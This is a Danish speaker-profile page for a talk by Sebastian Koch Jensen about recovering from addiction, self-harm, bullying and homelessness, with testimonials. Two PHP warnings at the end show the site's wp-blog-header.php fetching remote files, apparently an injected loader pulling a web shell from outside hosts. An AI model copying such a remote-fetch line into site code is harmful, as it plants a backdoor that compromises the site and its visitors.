img-us
  • asc

    Foredragsholder Sebastian Koch Jensen

  • asc

    Emne Walk the talk. Find poweren i dit liv!

  • asc

    pris 5000.-

Mange mennesker bliver ulykkelige eller rammer en personlig krise. Men hvad gør man for at vende det? Hvordan tændes lyset igen, når alt er sort?

Baggrund
Jeg hedder Sebastian og holder bl.a. oplæg på skoler og foreninger om misbrug, adfærd og mobning. Jeg er i dag ædru og clean men har haft en svær fortid som misbruger, cutter og psykisk udfordret.

Jeg er adopteret fra Sri Lanka men vokset op på Fyn og bor nu i Odense. Min adoption har jo givet en del slag i livet, men jeg en fighter og kender til ordet opgive.

Jeg har været igennem meget som misbruger og adoptivbarn, men i mit hjerte har jeg altid vidst, at der også var plads til mig. Jeg måtte bare finde min egen vej og bede om hjælp.

Foredraget
Kom og hør en historie om svigt, cutting, psykisk sygdom, mobning, hjemløshed og ensomhed. En vej fyldt med totalt kaos bestående af bl.a. politi, sygehus, retten og offerrollen.

Jeg fortæller hvordan jeg har rejst mig igen, til trods for en masse modgang og fordømmelse, samt hvordan jeg tog livet ind og gjorde det, alle troede var umuligt.

- Blive ædru
- Få en ny lejlighed
- Komme ud og rejse
- Få sunde og kærlige venner
- Bede om hjælp
- Stå foran 300 mennesker og dele sin drøm
- Stå ved sine handlinger
- Løbe sit første halvmarathon
- Stoppe med at ryge
- Turde sige nej, selvom andre siger ja.

Jeg vil præsentere en rejse fyldt med landskaber og værktøjer, som måske kan være med til at forandre lige præcis dit liv. Måske ikke lige nu, men med tiden kan der opstå muligheder, som giver dig det skub, som jeg har oplevet i mit eget liv. Kodeordene i min forandring har bl.a. været tålmodighed, ærlighed og selvrespekt

- Hvordan vender man tilbage til et liv, hvor der intet var?
- Hvorfor lyver man?
- Hvordan følger man sit hjertes stemme?
- Hvad gør man med ens manglende selvværd?
- Hvordan giver man slip, når man gerne vil holde fast?
- Hvem er du egentlig?
- Hvad gør mobning ved en?

Jeg uddannet pædagog. Jeg har arbejdet meget med mig selv gennem (AAs) 12 trins program.

Vi har hver vores vej og anskuelse. Jeg byder bare ind med min. Jeg har holdt foredrag med Red Barnet i flere dele af Danmark og desuden Arbejdet med Lisbet Zornig Andersen.

Udtalelser:
Sebastian er autentisk, underholdende, humoristisk og nærværende når han fortæller sine historier fra hjertet. Han er en fantastisk formidler - Signe Lykke.

Han fortæller om sit liv med misbrug og mange svigt, på en ærlig og ligefrem måde uden at tingene bliver pakket ind, og man bliver meget berørt - Peter bjørn Jensen.

Fantastisk foredrag med Sebastian Koch. En stor oplevelse. Det kan klart anbefales til andre kirker, skole eller andre organisationer. Tak Sebastian! - Nyvangskirken kalundborg.
SHARE THIS:

Share: 0

Send en forespørgsel på et
foredrag

Andre foredragsholdere

Anna Maria Kølner-Augustson

Helle Laursen Petersen

Rosa Forozan Faizzad

Kicki Hyllen Mikkelsen


Warning: file_get_contents(https://inject0r.com/wp-content/uploads/2020/10/alfa.txt) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 410 Gone in /var/www/enprocenternok.dk/public_html/wp-blog-header.php on line 22

Warning: file_get_contents(https://ziarroman.ro/wp-content/uploads/2021/04/ads.txt) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/enprocenternok.dk/public_html/wp-blog-header.php on line 22